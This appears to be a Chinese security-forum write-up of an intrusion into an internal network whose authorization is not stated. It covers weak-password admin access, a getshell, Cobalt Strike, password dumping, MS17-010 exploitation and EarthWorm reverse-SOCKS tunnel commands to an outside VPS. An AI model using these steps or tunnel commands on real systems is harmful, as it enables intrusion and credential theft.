站点信息
弱口令yyds
后台登录通过部署包getshell
各位看shell应该就知道是什么应用了
通过信息收集发现
外网 x.x.x.x
内网 192.168.10.36
system权限 3389开启
没有waf
直接掏出cs
可以正常上线,并且成功读取密码
上传代理,进内网看看
E:\ew_for_Win.exe -s rssocks -d vps -e 33333
./ew_for_linux64 -s rcsocks -l 22222 -e 33333 &
登录远程桌面(没必要)
全是外语,看不懂,操作不了,只能从shell里执行命令
通过发现还有不少内网ip
192.168.10.11 RSGROUP\BCSERVER101 SHARING
192.168.10.12 WORKGROUP\BCSERVER102 SHARING
192.168.10.14 WORKGROUP\BCSERVER104 SHARING
192.168.10.20 WORKGROUP\BROADCAST SHARING
192.168.10.25 RSGROUP\TOOLBOX1 SHARING
192.168.10.32 -no name-
192.168.10.33 -no name-
192.168.10.34 WORKGROUP\DESKTOP-Q1RM2EN SHARING
192.168.10.35 WORKGROUP\IMOTION-DB SHARING
192.168.10.36 WORKGROUP\NRCS-MAIN SHARING
192.168.10.37 WORKGROUP\NRCS-BACKUP SHARING
192.168.10.162 RSGROUP\BCSEVER162 SHARING
192.168.10.203 RSGROUP\RSFEED03 SHARING
192.168.11.203 RSGROUP\RSFEED02 SHARING
通过192.168.10.36 这台机器可以发现
192.168.10.37
172.x.x.x
这几台机器,感觉内网不应该才这么点机器
先打一波ms17_010
通过ms17_010搞定一台 192.168.10.202
成功登录这台机器,并把抓到的密码记录下来,准备碰撞一波
通过cs搞定192.168.10.37
通过cs 上线192.168.10.202这台机器,才能发现更多内网设备
192.168.10.36这台机器双网卡,与内网很多机器不互通
192.168.10.202 不出网,与内网多个网段互通
通过对172的设备扫描发现2台存在漏洞的机器,但是payload打过去失败
[+] 172.23.3.100:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)
[*] 172.23.3.1/24:445 - Scanned 103 of 256 hosts (40% complete)
[+] 172.23.3.122:445 - Host is likely VULNERABLE to MS17-010! - Windows Server (R) 2008 Enterprise 6002 Service Pack 2 x64 (64-bit)
/*
6 ธันวาคม 255917:31:51
User: sa
Server: RSFEED03
Database: BEAsset
Application:
*/
对着内网的机器一顿扫,没发现能利用的漏洞
回过头来看看内网有什么其他的web服务
没发现能利用的漏洞,倒是发现了一个网管系统,可以看到网络结构
没发现值得利用的漏洞,暂时只能拿到3台机器
BY:先知论坛
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论